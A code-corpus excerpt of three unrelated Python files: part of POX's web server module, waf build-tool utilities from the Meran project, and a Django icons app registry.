        path = os.path.join(os.path.abspath(self.args['root']), path)
    return path
def wrapRequestHandler (handlerClass):
    """Build a new handler type mixing SplitRequestHandler into handlerClass."""
    combined_name = "Split" + handlerClass.__name__
    bases = (SplitRequestHandler, handlerClass, object)
    return type(combined_name, bases, {})
from CGIHTTPServer import CGIHTTPRequestHandler
class SplitCGIRequestHandler (SplitRequestHandler,
                              CGIHTTPRequestHandler, object):
    """
    Runs CGIRequestHandler serving from an arbitrary path.
    This really should be a feature of CGIRequestHandler and the way of
    implementing it here is scary and awful, but it at least sort of works.
    """
    # Class-level lock: CGIHTTPRequestHandler resolves scripts relative to
    # the process CWD, so requests are serialized while we chdir around it.
    __lock = threading.Lock()

    def _split_dispatch (self, command):
        with self.__lock:
            olddir = os.getcwd()
            try:
                # self.args holds the CGI root directory for this split.
                os.chdir(self.args)
                return SplitRequestHandler._split_dispatch(self, command)
            finally:
                # Always restore the CWD, even if the handler raised.
                os.chdir(olddir)
class SplitterRequestHandler (BaseHTTPRequestHandler):
    """Top-level handler: routes each request to the registered
    sub-handler whose URL prefix matches (longest prefix wins)."""

    def __init__ (self, *args, **kw):
        #self.rec = Recording(args[0])
        #self.args = args
        #self.matches = self.matches.sort(key=lambda e:len(e[0]),reverse=True)
        #BaseHTTPRequestHandler.__init__(self, self.rec, *args[1:], **kw)
        BaseHTTPRequestHandler.__init__(self, *args, **kw)

    def log_request (self, code = '-', size = '-'):
        # Route request logging through the shared web logger.
        weblog.debug('splitter:"%s" %s %s',
                     self.requestline, str(code), str(size))

    def log_error (self, fmt, *args):
        weblog.error('splitter:' + fmt % args)

    def log_message (self, fmt, *args):
        weblog.info('splitter:' + fmt % args)

    def handle_one_request(self):
        """Parse one request and dispatch it to the matching sub-handler."""
        self.raw_requestline = self.rfile.readline()
        if not self.raw_requestline:
            self.close_connection = 1
            return
        if not self.parse_request(): # An error code has been sent, just exit
            return

        handler = None
        # server.matches is kept sorted longest-prefix-first, so the first
        # hit is the most specific registered handler.
        while True:
            for m in self.server.matches:
                if self.path.startswith(m[0]):
                    #print m,self.path
                    handler = m[1](self, m[0], m[3])
                    #pb = self.rec.getPlayback()
                    #handler = m[1](pb, *self.args[1:])
                    _setAttribs(self, handler)
                    if m[2]:
                        # Trim. Behavior is not "perfect"
                        handler.path = self.path[len(m[0]):]
                        if m[0].endswith('/'):
                            handler.path = '/' + handler.path
                    break
            if handler is None:
                handler = self
                if not self.path.endswith('/'):
                    # Handle splits like directories
                    self.send_response(301)
                    self.send_header("Location", self.path + "/")
                    self.end_headers()
                    # NOTE(review): after this redirect, control still falls
                    # through to handler._split_dispatch below with handler
                    # == self -- confirm this class actually provides
                    # _split_dispatch (it is not defined here).
                    break
            break
        return handler._split_dispatch(self.command)
class SplitThreadedServer(ThreadingMixIn, HTTPServer):
    """Threaded HTTP server dispatching by URL prefix to sub-handlers."""

    matches = [] # Tuples of (Prefix, TrimPrefix, Handler)

    # def __init__ (self, *args, **kw):
    #   BaseHTTPRequestHandler.__init__(self, *args, **kw)
    #   self.matches = self.matches.sort(key=lambda e:len(e[0]),reverse=True)

    def set_handler (self, prefix, handler, args = None, trim_prefix = True):
        """Register (or, with handler=None, unregister) a sub-handler
        for the given URL prefix."""
        # Not very efficient
        assert (handler is None) or (issubclass(handler, SplitRequestHandler))
        # Replace any existing registration for the same prefix.
        self.matches = [m for m in self.matches if m[0] != prefix]
        if handler is None: return
        self.matches.append((prefix, handler, trim_prefix, args))
        # Longest prefixes first so the most specific handler wins.
        self.matches.sort(key=lambda e:len(e[0]),reverse=True)

    def add_static_dir (self, www_path, local_path=None, relative=False):
        """
        Serves a directory of static content.
        www_path is the prefix of the URL that maps to this directory.
        local_path is the directory to serve content from.  If it's not
        specified, it is assume to be a directory with the same name as
        www_path.
        relative, if True, means that the local path is to be a sibling
        of the calling module.
        For an example, see the launch() function in this module.
        """
        if not www_path.startswith('/'): www_path = '/' + www_path

        if local_path is None:
            local_path = www_path[1:]
            if relative:
                local_path = os.path.basename(local_path)
        if relative:
            # Resolve relative to the *caller's* module directory.
            import inspect
            path = inspect.stack()[1][1]
            path = os.path.dirname(path)
            local_path = os.path.join(path, local_path)

        local_path = os.path.abspath(local_path)

        log.debug("Serving %s at %s", local_path, www_path)

        self.set_handler(www_path, StaticContentHandler,
                         {'root':local_path}, True);
def launch (address='', port=8000, static=False):
    """Start the web server on a daemon thread.

    static may be False (no static content), True (serve the default
    www_root next to this module), or a comma-separated string of
    [prefix:]directory entries.
    """
    httpd = SplitThreadedServer((address, int(port)), SplitterRequestHandler)
    core.register("WebServer", httpd)
    httpd.set_handler("/", CoreHandler, httpd, True)
    #httpd.set_handler("/foo", StaticContentHandler, {'root':'.'}, True)
    #httpd.set_handler("/f", StaticContentHandler, {'root':'pox'}, True)
    #httpd.set_handler("/cgis", SplitCGIRequestHandler, "pox/web/www_root")

    if static is True:
        httpd.add_static_dir('static', 'www_root', relative=True)
    elif static is False:
        pass
    else:
        static = static.split(",")
        for entry in static:
            if entry.lower() == "":
                # Bare comma entry: fall back to the default static dir.
                httpd.add_static_dir('static', 'www_root', relative=True)
                continue
            if ':' not in entry:
                # No explicit prefix: derive it from the directory's last
                # path component.
                directory = entry
                prefix = os.path.split(directory)
                if prefix[1] == '':
                    prefix = os.path.split(prefix[0])
                prefix = prefix[1]
                assert prefix != ''
            else:
                prefix,directory = entry.split(":")
            directory = os.path.expanduser(directory)
            httpd.add_static_dir(prefix, directory, relative=False)

    def run ():
        # Serve until process exit; swallow teardown races since this is
        # a daemon thread.
        try:
            log.debug("Listening on %s:%i" % httpd.socket.getsockname())
            httpd.serve_forever()
        except:
            pass
        log.info("Server quit")

    thread = threading.Thread(target=run)
    thread.daemon = True
    thread.start()
| mikeing2001/LoopDetection | pox/web/webcore.py | Python | gpl-3.0 | 15,662 |
#!/usr/bin/env python
# Meran - MERAN UNLP is a ILS (Integrated Library System) wich provides Catalog,
# Circulation and User's Management. It's written in Perl, and uses Apache2
# Web-Server, MySQL database and Sphinx 2 indexing.
# Copyright (C) 2009-2013 Grupo de desarrollo de Meran CeSPI-UNLP
#
# This file is part of Meran.
#
# Meran is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Meran is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Meran. If not, see <http://www.gnu.org/licenses/>.
# encoding: utf-8
# Meran - MERAN UNLP is a ILS (Integrated Library System) wich provides Catalog,
# Circulation and User's Management. It's written in Perl, and uses Apache2
# Web-Server, MySQL database and Sphinx 2 indexing.
# Copyright (C) 2009-2013 Grupo de desarrollo de Meran CeSPI-UNLP
#
# This file is part of Meran.
#
# Meran is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Meran is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Meran. If not, see <http://www.gnu.org/licenses/>.
# Thomas Nagy, 2005 (ita)
"""
Utilities, the stable ones are the following:
* h_file: compute a unique value for a file (hash), it uses
the module fnv if it is installed (see waf/utils/fnv & http://code.google.com/p/waf/wiki/FAQ)
else, md5 (see the python docs)
For large projects (projects with more than 15000 files) or slow hard disks and filesystems (HFS)
it is possible to use a hashing based on the path and the size (may give broken cache results)
The method h_file MUST raise an OSError if the file is a folder
import stat
def h_file(filename):
st = os.stat(filename)
if stat.S_ISDIR(st[stat.ST_MODE]): raise IOError('not a file')
m = Utils.md5()
m.update(str(st.st_mtime))
m.update(str(st.st_size))
m.update(filename)
return m.digest()
To replace the function in your project, use something like this:
import Utils
Utils.h_file = h_file
* h_list
* h_fun
* get_term_cols
* ordered_dict
"""
import os, sys, imp, string, errno, traceback, inspect, re, shutil, datetime, gc

# In python 3.0 we can get rid of all this
try: from UserDict import UserDict
except ImportError: from collections import UserDict

if sys.hexversion >= 0x2060000 or os.name == 'java':
    import subprocess as pproc
else:
    import pproc
import Logs
from Constants import *

try:
    from collections import deque
except ImportError:
    # Minimal stand-in for collections.deque on very old interpreters;
    # only popleft() is needed here.
    class deque(list):
        def popleft(self):
            return self.pop(0)

is_win32 = sys.platform == 'win32'

try:
    # defaultdict in python 2.5
    from collections import defaultdict as DefaultDict
except ImportError:
    # Fallback implementation of defaultdict for python < 2.5.
    class DefaultDict(dict):
        def __init__(self, default_factory):
            super(DefaultDict, self).__init__()
            self.default_factory = default_factory
        def __getitem__(self, key):
            try:
                return super(DefaultDict, self).__getitem__(key)
            except KeyError:
                # Missing key: create, store and return a default value.
                value = self.default_factory()
                self[key] = value
                return value
class WafError(Exception):
    """Base error for waf; remembers the call stack at construction time."""

    def __init__(self, *args):
        self.args = args
        try:
            # Capture where the error originated, for later reporting.
            self.stack = traceback.extract_stack()
        except:
            pass
        Exception.__init__(self, *args)

    def __str__(self):
        # Mirrors the historical and/or idiom: a single *truthy* argument
        # prints bare, anything else prints the whole args tuple.
        single = len(self.args) == 1 and self.args[0]
        return str(single or self.args)
class WscriptError(WafError):
    """Error raised from within a user wscript; records the offending
    file and (when it can be located) line number."""

    def __init__(self, message, wscript_file=None):
        if wscript_file:
            self.wscript_file = wscript_file
            self.wscript_line = None
        else:
            # Locate the wscript frame from the current call stack.
            try:
                (self.wscript_file, self.wscript_line) = self.locate_error()
            except:
                (self.wscript_file, self.wscript_line) = (None, None)

        msg_file_line = ''
        if self.wscript_file:
            msg_file_line = "%s:" % self.wscript_file
            if self.wscript_line:
                msg_file_line += "%s:" % self.wscript_line
        err_message = "%s error: %s" % (msg_file_line, message)
        WafError.__init__(self, err_message)

    def locate_error(self):
        # Walk the stack from the innermost frame outwards, looking for
        # the first frame that belongs to a wscript file.
        stack = traceback.extract_stack()
        stack.reverse()
        for frame in stack:
            file_name = os.path.basename(frame[0])
            is_wscript = (file_name == WSCRIPT_FILE or file_name == WSCRIPT_BUILD_FILE)
            if is_wscript:
                return (frame[0], frame[1])
        return (None, None)
# Progress-bar line template; win32 consoles need the cursor moved up first.
indicator = is_win32 and '\x1b[A\x1b[K%s%s%s\r' or '\x1b[K%s%s%s\r'

try:
    # Prefer the optional 'fnv' extension for fast file hashing.
    from fnv import new as md5
    import Constants
    Constants.SIG_NIL = 'signofnv'

    def h_file(filename):
        """Hash a file with fnv; raises OSError when not a regular file."""
        m = md5()
        try:
            m.hfile(filename)
            x = m.digest()
            if x is None: raise OSError("not a file")
            return x
        except SystemError:
            raise OSError("not a file" + filename)

except ImportError:
    try:
        try:
            from hashlib import md5
        except ImportError:
            from md5 import md5

        def h_file(filename):
            """Hash a file's contents with md5, reading 100KB chunks."""
            f = open(filename, 'rb')
            m = md5()
            # NOTE: 'filename' is reused as the read buffer; the loop ends
            # when read() returns an empty string at EOF.
            while (filename):
                filename = f.read(100000)
                m.update(filename)
            f.close()
            return m.digest()
    except ImportError:
        # portability fixes may be added elsewhere (although, md5 should be everywhere by now)
        md5 = None
class ordered_dict(UserDict):
    """Dictionary that tracks key insertion order in the .allkeys list."""

    def __init__(self, dict = None):
        self.allkeys = []
        UserDict.__init__(self, dict)

    def __setitem__(self, key, item):
        # First-time keys go to the end of the order list; overwriting an
        # existing key leaves its position unchanged.
        known = key in self.allkeys
        if not known:
            self.allkeys.append(key)
        UserDict.__setitem__(self, key, item)

    def __delitem__(self, key):
        # Keep the ordering list in sync on removal.
        self.allkeys.remove(key)
        UserDict.__delitem__(self, key)
def exec_command(s, **kw):
    """Run a command; keyword 'log' redirects both stdout and stderr.

    Returns the exit status, or -1 when the command cannot be started.
    """
    if 'log' in kw:
        kw['stdout'] = kw['stderr'] = kw['log']
        del(kw['log'])
    # Strings go through the shell; argument lists are executed directly.
    kw['shell'] = isinstance(s, str)

    try:
        proc = pproc.Popen(s, **kw)
        return proc.wait()
    except OSError:
        return -1

if is_win32:
    # win32 override: hide the console window for long command lines and
    # pump the pipes to avoid deadlocks on large outputs.
    def exec_command(s, **kw):
        if 'log' in kw:
            kw['stdout'] = kw['stderr'] = kw['log']
            del(kw['log'])
        kw['shell'] = isinstance(s, str)

        if len(s) > 2000:
            startupinfo = pproc.STARTUPINFO()
            startupinfo.dwFlags |= pproc.STARTF_USESHOWWINDOW
            kw['startupinfo'] = startupinfo

        try:
            if 'stdout' not in kw:
                kw['stdout'] = pproc.PIPE
                kw['stderr'] = pproc.PIPE
                proc = pproc.Popen(s,**kw)
                (stdout, stderr) = proc.communicate()
                Logs.info(stdout)
                if stderr:
                    Logs.error(stderr)
                return proc.returncode
            else:
                proc = pproc.Popen(s,**kw)
                return proc.wait()
        except OSError:
            return -1
listdir = os.listdir
if is_win32:
    def listdir_win32(s):
        """os.listdir wrapper for win32 quirks (bare drive names)."""
        if re.match('^[A-Za-z]:$', s):
            # os.path.isdir fails if s contains only the drive name... (x:)
            s += os.sep
        if not os.path.isdir(s):
            # Normalize missing paths to ENOENT like the POSIX listdir.
            e = OSError()
            e.errno = errno.ENOENT
            raise e
        return os.listdir(s)
    listdir = listdir_win32
def waf_version(mini = 0x010000, maxi = 0x100000):
    "Halts if the waf version is wrong"
    ver = HEXVERSION
    # Bounds may be given as hex ints or dotted strings ('1.5.0'); strings
    # are converted by replacing the dots ('1.5.0' -> int('10500', 16)).
    try: min_val = mini + 0
    except TypeError: min_val = int(mini.replace('.', '0'), 16)

    if min_val > ver:
        Logs.error("waf version should be at least %s (%s found)" % (mini, ver))
        sys.exit(0)

    try: max_val = maxi + 0
    except TypeError: max_val = int(maxi.replace('.', '0'), 16)

    if max_val < ver:
        Logs.error("waf version should be at most %s (%s found)" % (maxi, ver))
        sys.exit(0)
def python_24_guard():
    """Raise ImportError unless running on python 2.4, 2.5 or 2.6."""
    too_old = sys.hexversion < 0x20400f0
    too_new = sys.hexversion >= 0x3000000
    if too_old or too_new:
        raise ImportError("Waf requires Python >= 2.3 but the raw source requires Python 2.4, 2.5 or 2.6")
def ex_stack():
    """Return the current exception formatted as a string.

    With verbose logging (Logs.verbose > 1) the full traceback is
    included, otherwise just the exception value.
    """
    exc_type, exc_value, tb = sys.exc_info()
    if Logs.verbose > 1:
        exc_lines = traceback.format_exception(exc_type, exc_value, tb)
        return ''.join(exc_lines)
    return str(exc_value)
def to_list(sth):
    """Return *sth* as a list: strings are split on whitespace, any
    other value (assumed already list-like) is returned unchanged."""
    if not isinstance(sth, str):
        return sth
    return sth.split()
# Cache of loaded wscript modules, keyed by absolute file path.
g_loaded_modules = {}
"index modules by absolute path"

g_module=None
"the main module is special"

def load_module(file_path, name=WSCRIPT_FILE):
    "this function requires an absolute path"
    try:
        # Return the cached module if this wscript was already loaded.
        return g_loaded_modules[file_path]
    except KeyError:
        pass

    module = imp.new_module(name)

    try:
        code = readf(file_path, m='rU')
    except (IOError, OSError):
        raise WscriptError('Could not read the file %r' % file_path)

    # Remember the raw source for signature/hash computations.
    module.waf_hash_val = code

    # Let the wscript import siblings from its own directory.
    sys.path.insert(0, os.path.dirname(file_path))
    try:
        exec(compile(code, file_path, 'exec'), module.__dict__)
    except Exception:
        exc_type, exc_value, tb = sys.exc_info()
        raise WscriptError("".join(traceback.format_exception(exc_type, exc_value, tb)), file_path)
    # NOTE(review): sys.path is not popped when the exec above raises --
    # confirm whether the leaked path entry matters in practice.
    sys.path.pop(0)

    g_loaded_modules[file_path] = module

    return module
def set_main_module(file_path):
    "Load custom options, if defined"
    global g_module
    g_module = load_module(file_path, 'wscript_main')
    g_module.root_path = file_path

    # Provide defaults so later code can rely on these attributes existing.
    try:
        g_module.APPNAME
    except:
        g_module.APPNAME = 'noname'
    try:
        g_module.VERSION
    except:
        g_module.VERSION = '1.0'

    # note: to register the module globally, use the following:
    # sys.modules['wscript_main'] = g_module
def to_hashtable(s):
    """Parse KEY=VALUE lines (as found in env files) into a dict.

    Blank lines are skipped.  Values may themselves contain '=' characters:
    only the first '=' separates key from value (the old unbounded split
    silently truncated values such as FLAGS=a=b).  A non-empty line with no
    '=' at all still raises IndexError, as before.
    """
    tbl = {}
    lst = s.split('\n')
    for line in lst:
        if not line: continue
        mems = line.split('=', 1)
        tbl[mems[0]] = mems[1]
    return tbl
def get_term_cols():
    "console width"
    # Conservative default; replaced below by an ioctl-based probe when
    # the required modules exist and stderr is a tty.
    return 80

try:
    import struct, fcntl, termios
except ImportError:
    pass
else:
    if Logs.got_tty:
        def myfun():
            # Query the terminal size via the TIOCGWINSZ ioctl.
            dummy_lines, cols = struct.unpack("HHHH", \
                fcntl.ioctl(sys.stderr.fileno(),termios.TIOCGWINSZ , \
                    struct.pack("HHHH", 0, 0, 0, 0)))[:2]
            return cols
        # we actually try the function once to see if it is suitable
        try:
            myfun()
        except:
            pass
        else:
            get_term_cols = myfun
rot_idx = 0
rot_chr = ['\\', '|', '/', '-']
"the rotation character in the progress bar"

def split_path(path):
    # POSIX: the separator is always '/'.
    return path.split('/')

def split_path_cygwin(path):
    # Preserve the leading '//' of UNC-style cygwin paths.
    if path.startswith('//'):
        ret = path.split('/')[2:]
        ret[0] = '/' + ret[0]
        return ret
    return path.split('/')

re_sp = re.compile('[/\\\\]')
def split_path_win32(path):
    # Accept both '/' and '\\' separators; preserve UNC '\\\\' prefixes.
    if path.startswith('\\\\'):
        ret = re.split(re_sp, path)[2:]
        ret[0] = '\\' + ret[0]
        return ret
    return re.split(re_sp, path)

# Rebind split_path to the variant matching the host platform.
if sys.platform == 'cygwin':
    split_path = split_path_cygwin
elif is_win32:
    split_path = split_path_win32
def copy_attrs(orig, dest, names, only_if_set=False):
    """Copy the named attributes from *orig* onto *dest*.

    *names* may be a space-separated string or a list.  With only_if_set,
    attributes that are falsy (or missing) on the source are not copied.
    """
    for attr in to_list(names):
        value = getattr(orig, attr, ())
        if value or not only_if_set:
            setattr(dest, attr, value)
def def_attrs(cls, **kw):
    '''
    set attributes for class.
    @param cls [any class]: the class to update the given attributes in.
    @param kw [dictionary]: dictionary of attributes names and values.

    if the given class hasn't one (or more) of these attributes, add the attribute with its value to the class.
    '''
    # NOTE: iteritems() keeps this python-2 only, consistent with the file.
    for k, v in kw.iteritems():
        if not hasattr(cls, k):
            setattr(cls, k, v)
def quote_define_name(path):
    """Turn a path into an upper-case C define name (e.g. FOO_BAR_H)."""
    sanitized = re.compile("[^a-zA-Z0-9]").sub("_", path)
    return sanitized.upper()
def quote_whitespace(path):
    """Wrap *path* in double quotes when it contains inner whitespace."""
    needs_quotes = path.strip().find(' ') > 0
    if needs_quotes:
        quoted = '"%s"' % path
    else:
        quoted = path
    # Collapse accidental doubled quotes, as the original did.
    return quoted.replace('""', '"')
def trimquotes(s):
    """Strip trailing whitespace and one surrounding pair of single quotes.

    Returns '' for falsy input.  Fixed: a string of pure whitespace used
    to raise IndexError because rstrip() emptied it before s[0] was read.
    """
    if not s: return ''
    s = s.rstrip()
    if not s: return ''
    if s[0] == "'" and s[-1] == "'": return s[1:-1]
    return s
def h_list(lst):
    """Hash an arbitrary (repr-able) list into a digest string."""
    digest = md5()
    # The list's string form is hashed, so element order matters.
    digest.update(str(lst))
    return digest.digest()
def h_fun(fun):
    """Hash a function by its source code, cached on the function itself."""
    try:
        # Fast path: previously computed and cached as fun.code.
        return fun.code
    except AttributeError:
        try:
            h = inspect.getsource(fun)
        except IOError:
            # Builtins / dynamically created functions have no source.
            h = "nocode"
        try:
            # Cache for next time; some callables reject new attributes.
            fun.code = h
        except AttributeError:
            pass
        return h
def pprint(col, str, label='', sep=os.linesep):
    "print messages in color"
    colored = "%s%s%s" % (Logs.colors(col), str, Logs.colors.NORMAL)
    sys.stderr.write("%s %s%s" % (colored, label, sep))
def check_dir(dir):
    """If a folder doesn't exists, create it."""
    try:
        # stat() doubles as an existence check.
        os.stat(dir)
    except OSError:
        try:
            os.makedirs(dir)
        except OSError, e:
            raise WafError("Cannot create folder '%s' (original error: %s)" % (dir, e))
def cmd_output(cmd, **kw):
    """Run *cmd* and return its standard output.

    Keyword 'silent' also captures stderr and suppresses the non-zero
    exit exception (returning '' instead); 'e' is accepted as an alias
    for 'env'.  Raises ValueError when the command cannot be launched or
    (unless silent) exits non-zero.
    """
    silent = False
    if 'silent' in kw:
        silent = kw['silent']
        del(kw['silent'])

    if 'e' in kw:
        tmp = kw['e']
        del(kw['e'])
        kw['env'] = tmp

    # Strings go through the shell; argument lists are executed directly.
    kw['shell'] = isinstance(cmd, str)
    kw['stdout'] = pproc.PIPE
    if silent:
        kw['stderr'] = pproc.PIPE

    try:
        p = pproc.Popen(cmd, **kw)
        output = p.communicate()[0]
    except OSError, e:
        raise ValueError(str(e))

    if p.returncode:
        if not silent:
            msg = "command execution failed: %s -> %r" % (cmd, str(output))
            raise ValueError(msg)
        output = ''
    return output
reg_subst = re.compile(r"(\\\\)|(\$\$)|\$\{([^}]+)\}")

def subst_vars(expr, params):
    "substitute ${PREFIX}/bin in /usr/local/bin"
    def repl_var(m):
        # Escaped backslash and dollar pass through as literals.
        if m.group(1):
            return '\\'
        if m.group(2):
            return '$'
        name = m.group(3)
        try:
            # Environment objects flatten list values via get_flat().
            return params.get_flat(name)
        except AttributeError:
            # Plain mappings are indexed directly.
            return params[name]
    return reg_subst.sub(repl_var, expr)
def unversioned_sys_platform_to_binary_format(unversioned_sys_platform):
    "infers the binary format from the unversioned_sys_platform name."
    elf_systems = ('linux', 'freebsd', 'netbsd', 'openbsd', 'sunos')
    if unversioned_sys_platform in elf_systems:
        return 'elf'
    if unversioned_sys_platform == 'darwin':
        return 'mac-o'
    if unversioned_sys_platform in ('win32', 'cygwin', 'uwin', 'msys'):
        return 'pe'
    # TODO we assume all other operating systems are elf, which is not true.
    # we may set this to 'unknown' and have ccroot and other tools handle
    # the case "gracefully" (whatever that means).
    return 'elf'
def unversioned_sys_platform():
    """Return sys.platform with any trailing version digits removed.

    sys.platform embeds the version of the build host (e.g. 'freebsd7'
    even on a freebsd8 system), so the digits are stripped -- except for
    names like 'win32' or 'os2' where the digits are part of the name.
    On Jython the real OS is mapped back from Java's os.name property.
    """
    platform = sys.platform
    if platform == 'java':
        # The real OS is hidden under the JVM.
        from java.lang import System
        os_name = System.getProperty('os.name')
        # see http://lopica.sourceforge.net/os.html for possible values
        if os_name == 'Mac OS X':
            return 'darwin'
        if os_name.startswith('Windows '):
            return 'win32'
        if os_name == 'OS/2':
            return 'os2'
        if os_name == 'HP-UX':
            return 'hpux'
        if os_name in ('SunOS', 'Solaris'):
            return 'sunos'
        platform = os_name.lower()
    # 'win32' and the os2 family keep their digits on purpose.
    if platform == 'win32' or (platform.endswith('os2') and platform != 'sunos2'):
        return platform
    return re.split('\d+$', platform)[0]
#@deprecated('use unversioned_sys_platform instead')
def detect_platform():
    """this function has been in the Utils module for some time.
    It's hard to guess what people have used it for.
    It seems its goal is to return an unversionned sys.platform, but it's not handling all platforms.
    For example, the version is not removed on freebsd and netbsd, amongst others.
    """
    platform = sys.platform

    # known POSIX systems: match by substring (sys.platform may be 'linux2')
    for known in 'cygwin linux irix sunos hpux aix darwin'.split():
        if known in platform:
            return known

    # unknown POSIX
    if os.name in 'posix java os2'.split():
        return os.name

    return platform
def load_tool(tool, tooldir=None):
    '''
    load_tool: import a Python module, optionally using several directories.
    @param tool [string]: name of tool to import.
    @param tooldir [list]: directories to look for the tool.
    @return: the loaded module.

    Warning: this function is not thread-safe: plays with sys.path,
    so must run in sequence.
    '''
    if tooldir:
        assert isinstance(tooldir, list)
        # Temporarily give the tool directories import priority.
        sys.path = tooldir + sys.path

    try:
        try:
            return __import__(tool)
        except ImportError, e:
            Logs.error('Could not load the tool %r in %r:\n%s' % (tool, sys.path, e))
            raise
    finally:
        # Restore sys.path whether or not the import succeeded.
        if tooldir:
            sys.path = sys.path[len(tooldir):]
def readf(fname, m='r'):
    """Return the entire contents of *fname*, opened with mode *m*.

    The file handle is closed even if the read fails.
    """
    f = open(fname, m)
    try:
        contents = f.read()
    finally:
        f.close()
    return contents
def nada(*k, **kw):
    """A no-op accepting any arguments; useful as a default callback."""
    return None
def diff_path(top, subdir):
    """difference between two absolute paths"""
    # Normalize both paths to forward-slash components before comparing.
    top_parts = os.path.normpath(top).replace('\\', '/').split('/')
    sub_parts = os.path.normpath(subdir).replace('\\', '/').split('/')
    if len(top_parts) == len(sub_parts):
        return ''
    # Keep the components of subdir that extend past top's depth.
    tail = sub_parts[len(top_parts) - len(sub_parts):]
    return os.path.join(*tail)
class Context(object):
    """A base class for commands to be executed from Waf scripts"""

    def set_curdir(self, dir):
        self.curdir_ = dir

    def get_curdir(self):
        try:
            return self.curdir_
        except AttributeError:
            # Lazily default to the process CWD on first access.
            self.curdir_ = os.getcwd()
            return self.get_curdir()

    curdir = property(get_curdir, set_curdir)

    def recurse(self, dirs, name=''):
        """The function for calling scripts from folders, it tries to call wscript + function_name
        and if that file does not exist, it will call the method 'function_name' from a file named wscript
        the dirs can be a list of folders or a string containing space-separated folder paths
        """
        # Default to the caller's function name (e.g. 'configure', 'build').
        if not name:
            name = inspect.stack()[1][3]

        if isinstance(dirs, str):
            dirs = to_list(dirs)

        for x in dirs:
            if os.path.isabs(x):
                nexdir = x
            else:
                nexdir = os.path.join(self.curdir, x)

            base = os.path.join(nexdir, WSCRIPT_FILE)
            file_path = base + '_' + name

            try:
                # Prefer a dedicated file such as 'wscript_build'.
                txt = readf(file_path, m='rU')
            except (OSError, IOError):
                # Fall back to calling function <name> from 'wscript'.
                try:
                    module = load_module(base)
                except OSError:
                    raise WscriptError('No such script %s' % base)

                try:
                    f = module.__dict__[name]
                except KeyError:
                    raise WscriptError('No function %s defined in %s' % (name, base))

                if getattr(self.__class__, 'pre_recurse', None):
                    self.pre_recurse(f, base, nexdir)
                old = self.curdir
                self.curdir = nexdir
                try:
                    f(self)
                finally:
                    # Restore the current directory even on error.
                    self.curdir = old
                if getattr(self.__class__, 'post_recurse', None):
                    self.post_recurse(module, base, nexdir)
            else:
                # Execute the wscript_<name> file's code with 'ctx' bound.
                dc = {'ctx': self}
                if getattr(self.__class__, 'pre_recurse', None):
                    dc = self.pre_recurse(txt, file_path, nexdir)
                old = self.curdir
                self.curdir = nexdir
                try:
                    try:
                        exec(compile(txt, file_path, 'exec'), dc)
                    except Exception:
                        exc_type, exc_value, tb = sys.exc_info()
                        raise WscriptError("".join(traceback.format_exception(exc_type, exc_value, tb)), base)
                finally:
                    self.curdir = old
                if getattr(self.__class__, 'post_recurse', None):
                    self.post_recurse(txt, file_path, nexdir)
if is_win32:
    old = shutil.copy2

    def copy2(src, dst):
        """shutil.copy2 replacement that also re-applies stat to *dst*.

        BUGFIX: the original called shutil.copystat(src, src), copying
        the source's metadata onto itself and leaving the destination
        untouched, which defeated the whole point of this win32 patch.
        """
        old(src, dst)
        shutil.copystat(src, dst)

    setattr(shutil, 'copy2', copy2)
def zip_folder(dir, zip_file_name, prefix):
    """
    Archive the contents of *dir* into zip_file_name (deflate-compressed).

    prefix represents the app to add in the archive: every stored name is
    prefixed with it, with a trailing separator appended when missing.
    """
    import zipfile
    archive = zipfile.ZipFile(zip_file_name, 'w', compression=zipfile.ZIP_DEFLATED)
    base = os.path.abspath(dir)

    if prefix and not prefix.endswith(os.sep):
        prefix += os.sep

    n = len(base)
    for root, dirs, files in os.walk(base):
        for name in files:
            # Store under prefix + path-relative-to-base.
            stored = prefix + root[n:] + os.sep + name
            archive.write(root + os.sep + name, stored, zipfile.ZIP_DEFLATED)
    archive.close()
def get_elapsed_time(start):
    "Format a time delta (datetime.timedelta) using the format DdHhMmS.MSs"
    delta = datetime.datetime.now() - start
    # cast to int necessary for python 3.0
    days = int(delta.days)
    hours = int(delta.seconds / 3600)
    minutes = int((delta.seconds - hours * 3600) / 60)
    seconds = (delta.seconds - hours * 3600 - minutes * 60
               + float(delta.microseconds) / 1000 / 1000)
    # Larger units are only shown when some unit above them is non-zero.
    pieces = []
    if days:
        pieces.append('%dd' % days)
    if days or hours:
        pieces.append('%dh' % hours)
    if days or hours or minutes:
        pieces.append('%dm' % minutes)
    pieces.append('%.3fs' % seconds)
    return ''.join(pieces)
if os.name == 'java':
    # For Jython (they should really fix the inconsistency)
    try:
        gc.disable()
        gc.enable()
    except NotImplementedError:
        # Jython's gc may not support toggling; make disable() a no-op
        # (well, an enable) so callers don't crash.
        gc.disable = gc.enable
from __future__ import absolute_import

from django.utils.translation import ugettext_lazy as _

from smart_settings import LocalScope

from .icons import icon_icons_app
from .literals import DEFAULT_ICON_SET

# App registration metadata, consumed by the project's app registry.
name = 'icons'
label = _(u'Icons')
description = _(u'Handles the registration and rendering of icons and sprites.')
dependencies = ['app_registry']
icon = icon_icons_app

# Settings exposed through smart_settings; ICON_SET selects the icon theme
# used to render every icon in the project.
settings = [
    {
        'name': 'ICON_SET',
        'default': DEFAULT_ICON_SET,
        'description': _(u'Icon set to use to render all the icon in the project.'),
        'scopes': [LocalScope()]  # TODO: Cluster, Org, User
    }
]
| rosarior/rua | rua/apps/icons/registry.py | Python | gpl-3.0 | 617 |